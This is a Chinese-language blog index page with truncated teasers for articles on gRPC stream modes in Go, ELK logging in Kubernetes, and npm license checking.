go的grpc的三种流模式通信




go的grpc的三种流模式通信 1、grpc通信模式简介2、stream.proto文件3、服务端代码 server.go4、客户端代码client.go5、测试说明 1、grpc通信模式简介 grpc的数据传输可以分为4种模式&#xff1a; 简单模式 (一元调用) 服务端流模式 (服务端返回实时股票数据给前台) 客户端流模…




阅读更多...

















kubernetes中使用ELK进行日志收集








kubernetes中使用ELK进行日志收集




目录 一、需要收集哪些日志 
1、kubernetes集群的系统组件日志 
2、应用日志 
二、日志收集方案ELK 
1、收集日志&#xff1a;Logstash 
2、存储日志&#xff1a;Elasticsearch 
3、展示日志&#xff1a;Kibana 
三、安装elk 
1、下载安装包  
2、创建用户并切换到新用户 
3、上…




阅读更多...

















npm许可证检查








npm许可证检查




node开发做项目&#xff0c;很少有人去纯手工打造&#xff0c;大多是采用一些开源框架&#xff0c;还会使用前人做好的轮子&#xff0c;所以咱们的项目文件里&#xff0c;除了自己编写的js文件&#xff0c;还会带有一些拿来主义的npm模块&#xff0c;从其他开源发布网站上下载的…




阅读更多...


















最新文章


















Copyright @ 2022~2023